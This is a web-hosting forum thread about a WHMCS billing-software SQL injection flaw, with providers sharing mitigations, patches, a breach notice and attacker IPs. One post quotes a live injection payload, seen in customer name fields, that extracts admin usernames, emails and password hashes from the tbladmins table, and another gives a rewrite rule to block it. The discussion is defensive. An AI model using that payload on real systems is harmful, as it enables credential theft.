# New WHMCS Exploit



## Aldryic C'boas

http://localhost.re/p/whmcs-527-vulnerability

tl;dr - A rather gaping security hole in WHMCS.  I've taken ours offline - strongly suggest other providers do the same.


----------



## concerto49

Have you contacted WHMCS? Just did.


----------



## fapvps

Yeah this one is pretty bad. We took ours down also.


----------



## Jono20201

Damn. Disabled ours for now, has this been confirmed? Does just putting the system into Maintenance mode make it 'safe'?


----------



## Aldryic C'boas

Jono20201 said:


> Damn. Disabled ours for now, has this been confirmed? Does just putting the system into Maintenance mode make it 'safe'?


Yes, this is confirmed.  After seeing the... utterly incompetant coding practices, I wouldn't trust just using Maintenance mode.  I ripped down our entire install and just put up a placeholder for now.


----------



## DamienSB

Aldryic C said:


> Yes, this is confirmed.  After seeing the... utterly incompetant coding practices, I wouldn't trust just using Maintenance mode.  I ripped down our entire install and just put up a placeholder for now.





Code:


[[email protected] ~]# service httpd stop
Stopping httpd:                                            [  OK  ]
[[email protected] ~]#


----------



## Jono20201

Aldryic C said:


> Yes, this is confirmed.  After seeing the... utterly incompetant coding practices, I wouldn't trust just using Maintenance mode.  I ripped down our entire install and just put up a placeholder for now.


Mind if I nick your parts of your maintenance message? Too tired to think of something decent.




DamienSB said:


> [[email protected] ~]# service httpd stop
> Stopping httpd:                                            [  OK  ]
> 
> 
> [[email protected] ~]#


Surely best to put a html message up?


----------



## Aldryic C'boas

Jono20201 said:


> Mind if I nick your parts of your maintenance message? Too tired to think of something decent.


Nah, go for it, I don't mind.


----------



## rds100

RewriteCond %{QUERY_STRING} AES_ENCRYPT

RewriteRule ^(.+) /sorry.html [L]

 

 

This helps? Not sure if %{QUERY_STRING} would catch POST data or what would be the correct variable for that.


----------



## DamienSB

Jono20201 said:


> Mind if I nick your parts of your maintenance message? Too tired to think of something decent.
> 
> 
> Surely best to put a html message up?


Didn't know if the exploit was real or not - why spend 5 minutes on an error page when you might remove it in an hour. But it looks like this is real, so I’m going to make a page. But either way, people aren't going to care why it is down.


----------



## Erawan

So this is why RamNode went down for the client area?


----------



## George_Fusioned

I added the following on top of my .htaccess



Code:


Order allow,deny
Allow from 127.0.0.1 # for email piping to work
Allow from x.x.x.x # my VPN IP
Deny from all


----------



## rds100

@George_Fusioned you might want to also add these:

allow from 173.0.81.1

allow from 173.0.81.33

allow from 66.211.170.66

 

This is to allow paypal's IPN to still work (for subscribtion payments that you might receive).


----------



## AnthonySmith

I assume it affects pre 5.2.7 as well?


----------



## Aldryic C'boas

AnthonySmith said:


> I assume it affects pre 5.2.7 as well?


The file in question is an old one, pre 4.* days.  I can't imagine they would replace a secure, working file with the atrocity there now, so safest just to assume all versions are affected.


----------



## Nick_A

Erawan said:


> So this is why RamNode went down for the client area?


Yes.


----------



## Jono20201

Wonder how long it'll take WHMCS. Hope they aren't thinking "we'll fix it monday". Lot of lost business.


----------



## MCH-Phil

Our billing system is now offline as well.  Oh well another fun day


----------



## Jono20201

http://blog.whmcs.com/?t=79274

Lets hope their not all on a plane back home.


----------



## Aldryic C'boas

Jono20201 said:


> Wonder how long it'll take WHMCS. Hope they aren't thinking "we'll fix it monday". Lot of lost business.





Jono20201 said:


> http://blog.whmcs.com/?t=79274
> 
> Lets hope their not all on a plane back home.


David's working on a fix now, from the hotel lobby.


----------



## Jon.Fatino

Thats a pretty bad one right there... Hope it gets fixed asap.


----------



## fapvps

At least they are working on it.


----------



## George_Fusioned

Aldryic C said:


> Nah, go for it, I don't mind.


Shamelessly copied it as well :wub:


----------



## ryanarp

George_Fusioned said:


> Shamelessly copied it as well :wub:


Lets all include Buyvm support e-mail as well, then we can take the day off  Hopefully everyone changed those minor details


----------



## Jade

Ahh, hope it gets fixed soon! We removed our billing system as well until this is fixed.


----------



## Jono20201

https://twitter.com/whmcs/status/385811317179052032


----------



## vld

Incremental patch: http://www.whmcs.com/members/downloads.php?action=displaycat&catid=1


----------



## AnthonySmith

People now seem to be suggesting this only affected 5.2.7 ...I find that hard to believe.


----------



## serverian

AnthonySmith said:


> People now seem to be suggesting this only affected 5.2.7 ...I find that hard to believe.


It affected all 5.x, didn't check it on 4


----------



## CodyRo

serverian said:


> It affected all 5.x, didn't check it on 4


You have bigger issues if you're still running 4.x


----------



## Aldryic C'boas

serverian said:


> It affected all 5.x, didn't check it on 4


It's an old file, from back in the <4.* days.  I find it very hard to believe that they would take a secure, working file and replace it with such a massive security hole - so there's every reason to assume that all WHMCS versions are affected.


----------



## Cloudrck

I take it WHMCS doesn't do security audits?


----------



## JackDoan

Aldryic C said:


> http://localhost.re/p/whmcs-527-vulnerability
> 
> tl;dr - A rather gaping security hole in WHMCS.  I've taken ours offline - strongly suggest other providers do the same.


Including a python script to take advantage of it? Talk about responsible disclosure. -_-

*Edit:* localhost.re includes the script, not Aldryic. Important detail for those who don't actually click the link.


----------



## RiotSecurity

That's fine by me. I'd hate to see good old Robert Clarke hit...

oh wait.


----------



## lbft

The first provider emailing with bad news, ShardHost:

URGENT - Recent WHMCS Exploit

Upon investigation in light of the recent WHMCS exploit (http://blog.whmcs.com/?t=79427) it has been discovered that our client database was accessed as a result of using this exploit. Although client area passwords are not stored in plain text it is advisable that you change passwords as a matter of precaution. KVM root server passwords are not affected as these are not stored at all.

Although we patched our systems as soon as we were able to it seems we were one of the first targets. We have since restored a clean restoration of our billing system prior to the attack and have confirmed this is no longer vulnerable to the particular attack vector used.

We apologise sincerely for this breach of your trust and are deeply disappointed ourselves in the trust we place in WHMCS as a third part billing software provider.

If you have any questions on this matter, please contact us via support ticket; where we will be happy to discuss this matter in detail.

Again please accept our apologies on this matter.

I doubt this will be the last, unfortunately, although I'm more worried about the customers of the providers that either don't notify them or don't even know they were exploited.


----------



## rds100

Everyone go and install mod_dumpio. Who knows when you would need to analyze the logs?


----------



## Aldryic C'boas

lbft said:


> The first provider emailing with bad news, ShardHost:
> 
> URGENT - Recent WHMCS Exploit
> 
> Upon investigation in light of the recent WHMCS exploit (http://blog.whmcs.com/?t=79427) it has been discovered that our client database was accessed as a result of using this exploit. Although client area passwords are not stored in plain text it is advisable that you change passwords as a matter of precaution. KVM root server passwords are not affected as these are not stored at all.
> 
> 
> Although we patched our systems as soon as we were able to it seems we were one of the first targets. We have since restored a clean restoration of our billing system prior to the attack and have confirmed this is no longer vulnerable to the particular attack vector used.
> 
> 
> We apologise sincerely for this breach of your trust and are deeply disappointed ourselves in the trust we place in WHMCS as a third part billing software provider.
> 
> 
> If you have any questions on this matter, please contact us via support ticket; where we will be happy to discuss this matter in detail.
> 
> 
> Again please accept our apologies on this matter.
> 
> I doubt this will be the last, unfortunately, although I'm more worried about the customers of the providers that either don't notify them or don't even know they were exploited.


Passwords aside - that's a lot of names/emails/physical addresses that just got leaked.  Those folks won't be happy.


----------



## CodyRo

rds100 said:


> Everyone go and install mod_dumpio. Who knows when you would need to analyze the logs?


That is definitely useful but things such as WHMCS (or really any web application) should be behind a WAF. Most generic SQL injection rules would have prevented this - I know ours prevented the exploit from even getting to WHMCS.

I'd recommend taking a peak at ASL's modsec rules - they're robust and very well done (modular to boot as well)!


----------



## George_Fusioned

CodyRo said:


> I'd recommend taking a peak at ASL's modsec rules - they're robust and very well done (modular to boot as well)!


Did you get them to work with LiteSpeed?


----------



## MannDude

Who's been hit? Looks pretty nasty.

Waking up to some drama.


----------



## CodyRo

George_Fusioned said:


> Did you get them to work with LiteSpeed?


LiteSpeeds mod_security implementation is iffy at best (in my opinion - although they've done a better job at improving it). We personally put web applications that we don't trust / that are important behind Apache / mod_security to get the fullest effect. Far too many times we have seen wrong behaviour with mod_security rules under LiteSpeed.

I know some of the older ASL rules worked fine with LiteSpeed however the latest do not I believe.


----------



## George_Fusioned

Yeah, that's my experience too. Only had luck with older ASL rules until now, but to be fair they're improving mod_security support in each version.


----------



## KuJoe

Any experience with NAXSI?


----------



## terafire

We took ours down this morning, and had as soon as we were back up we had some odd non-completed order sign-ups.


----------



## rsk

I just deleted the file when I heard about the exploit, waited for a bit, got the new "patched" update, uploaded the update, some idiot decided to try to exploit - he failed.

Hell, we don't really need a "panic" button hahaha, we just need software developers to use common sense when coding  :lol:


----------



## TJR

why not put your WHMCS behind an application firewall?  we did.  SQL injections are not happening here.  lots of free ones available online too.  A great way of protecting against future attacks


----------



## GIANT_CRAB

TJR said:


> why not put your WHMCS behind an application firewall?  we did.  SQL injections are not happening here.  lots of free ones available online too.  A great way of protecting against future attacks


Nice Cloudflare shilling :^)


----------



## tchen

Or... Naxsi (which I'll give TJR the benefit of doubt on)


Edit :!Nvm, I see kujoe already mentioned it.


----------



## TJR

huh?


----------



## RiotSecurity

TJR said:


> why not put your WHMCS behind an application firewall?  we did.  SQL injections are not happening here.  lots of free ones available online too.  A great way of protecting against future attacks


I rofl'd so hard.


----------



## TJR

am I missing something here or are you guys just jerks?


----------



## CodyRo

TJR said:


> am I missing something here or are you guys just jerks?


I think the latter.



GIANT_CRAB said:


> Nice Cloudflare shilling :^)


And I'm shilling for mod_security while others are shilling for Naxsi. *takes off the tin foil hat*


----------



## MannDude

TJR said:


> am I missing something here or are you guys just jerks?


The later part. I think that they're under the impression you work for Cloudflare or something. I don't know. Ignore them.


----------



## KuJoe

So does anybody here have any experience with NAXSI? I was looking into it but I won't have time to setup a test environment for it until next week and I wouldn't put anything into production without testing it so I'm looking for some feedback before I proceed.


----------



## VPSCorey

We'll installed ASL onto my VM's running WHMCS / Hostbill to give it some exposure no immediate issues other than Hostbill requires curl_exec and curl_multi_exec apparently to some functions.


----------



## KuJoe

NAXSI was a simple install and looking pretty nice so far. I've got it in learning mode for now but it looks like I could put it live without any issues. My only fear is that I'm developing our new control panel on WHMCS 5.2.x with Apache so I'll need to move that over at some point.


----------



## ServerBros

We've had various users sign up and try this, my guess is they are just simply using the inurl: powered by whmcs on google. Thankfully they were quick in patching it, however a company the size of WHMCS should really have their code audited before release to prevent things like this not being picked up.


----------



## Riccardo_G

i have install version 5.2.8


----------



## XFS_Duke

People on one of our WHMCS installs keep changing their first name to:

'AES_ENCRYPT(1,1), firstname=(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)

It isn't doing anything, but it's funny to see them register and try and try and try... lol


----------



## TJR

XFS_Duke said:


> People on one of our WHMCS installs keep changing their first name to:
> 
> 'AES_ENCRYPT(1,1), firstname=(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)
> 
> It isn't doing anything, but it's funny to see them register and try and try and try... lol


we should be posting IP addresses, can black-list them.


----------



## XFS_Duke

I'll post...

122.3.33.7

86.143.76.124

Will post more as I see them. I did, as well as recommend that everyone using WHMCS lock the name fields on their installation. It's simple to do:

Setup > General Settings > Other then Locked Client Profile Fields

I locked First Name, Last Name and Company... You could lock them all and make the customer contact you to update, but eh...


----------



## concerto49

XFS_Duke said:


> People on one of our WHMCS installs keep changing their first name to:
> 
> 
> 'AES_ENCRYPT(1,1), firstname=(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)
> 
> 
> It isn't doing anything, but it's funny to see them register and try and try and try... lol


We get this all day long too.


----------



## shovenose

XFS_Duke said:


> I locked First Name, Last Name and Company... You could lock them all and make the customer contact you to update, but eh...


I lock them all


----------



## ryanarp

concerto49 said:


> We get this all day long too.


We have only had this happen once, that was fun to watch.


----------



## Riccardo_G




----------



## SkylarM

We've had a bunch of people sign up but not place orders, we have Client fields locked outside of email after initial registration so maybe that helped? Who knows.


----------



## Francisco

Aldryic locks everything.

It's a pain in the butt to the customer but honestly, the only time people want to change things is when accounts aren't in their own name.

Francisco


----------



## SkylarM

Francisco said:


> Aldryic locks everything.
> 
> 
> It's a pain in the butt to the customer but honestly, the only time people want to change things is when accounts aren't in their own name.
> 
> 
> Francisco


I had to lock it all down when a customer doing not so legal things was terminated he promptly went in and edited his account details out of the account. Wasn't having any of that


----------



## MartinD

Likewise. We do have first and last name locked though. Regardless, all changes are logged and archived too for the above reason mentioned by SkylarM.


----------



## TJR

another exploit

http://localhost.re/


----------



## TJR

and here is an IP to add to your block lists:  91.194.91.196


----------



## jarland

Yay!


----------



## ServerBros

Thankfully another prompt fix, although it seems to have broken the mass mailing function!


----------



## RiotSecurity

ServerBros said:


> Thankfully another prompt fix, although it seems to have broken the mass mailing function!


and tomorrow... "New WHMCS Exploit, AGAIN"


----------



## Reece-DM

ServerBros said:


> Thankfully another prompt fix, although it seems to have broken the mass mailing function!


Glad it's not just me who realised that!


----------



## tchen

That mass mailing function deserved to be broken


----------



## ShardHost

WHMCS really need to get their act together.  They seem to learn nothing from each exploit.


----------



## ServerBros

RiotSecurity said:


> and tomorrow... "New WHMCS Exploit, AGAIN"


Too true, it's going to take a complete re-write to fix all their sloppy coding, or at the very least an external audit. cPanel are not much better right enough however they don't seem to make as rookie mistakes as WHMCS


----------



## TJR

another IP to add to your block lists:  46.137.244.223


----------



## Ree

ShardHost said:


> WHMCS really need to get their act together.  They seem to learn nothing from each exploit.


In their defense, if these exploits are all in old code then anything they learn now won't help fix code they wrote days/months/years ago.


----------



## wlanboy

TJR said:


> another IP to add to your block lists:  46.137.244.223


Time to write an abuse email to Amazon Data Services Ireland Ltd.


----------



## Damian

You guys don't already have Amazon EC2 IP ranges blocked?


----------



## NodeBytes

The problem is that Amazon EC2 has a lot of legitimate users and a whole lot of spammers.


----------



## concerto49

Ree said:


> In their defense, if these exploits are all in old code then anything they learn now won't help fix code they wrote days/months/years ago.


Most of these are poor coding practices. They are mistakes that are so obvious. I wouldn't say it's old code. I think it's just how those developers operate. They can continue to patch the problems as they come but doesn't look like the root cause is getting fixed.


----------



## TJR

another????  is this a joke?   http://localhost.re/

does anyone know if that invoice exploit is patched with the new 5.2.12 update?

thank you


----------



## Magiobiwan

The invoice one was supposedly patched in the latest update.


----------



## TJR

now our credit cards are not processing in the nightly batch with the new patch of the patch of the patch (i.e. v5.2.12)


----------



## Francisco

TJR said:


> now our credit cards are not processing in the nightly batch with the new patch of the patch of the patch (i.e. v5.2.12)


I was so confused reading this the first time 

Francisco


----------



## Damian

FWIW, our credit cards have been processing fine. What CC gateway are you using? We're using Stripe via ServerPing's module.



Francisco said:


> I was so confused reading this the first time
> 
> Francisco


It's getting to be a bit cat-in-the-hat isn't it? One vuln, two vuln, red vuln, blue vuln.


----------



## TJR

we're using payflow

batch says [SIZE=8.5pt]0 Credit Card Payments Processed (0 Failed)[/SIZE]

also if you click the button to process all overdue invoices, same thing.

you got to hit them one by one and 'attempt capture' errr


----------



## SkylarM

Stripe via ServerPing's module working fine here as well.


----------

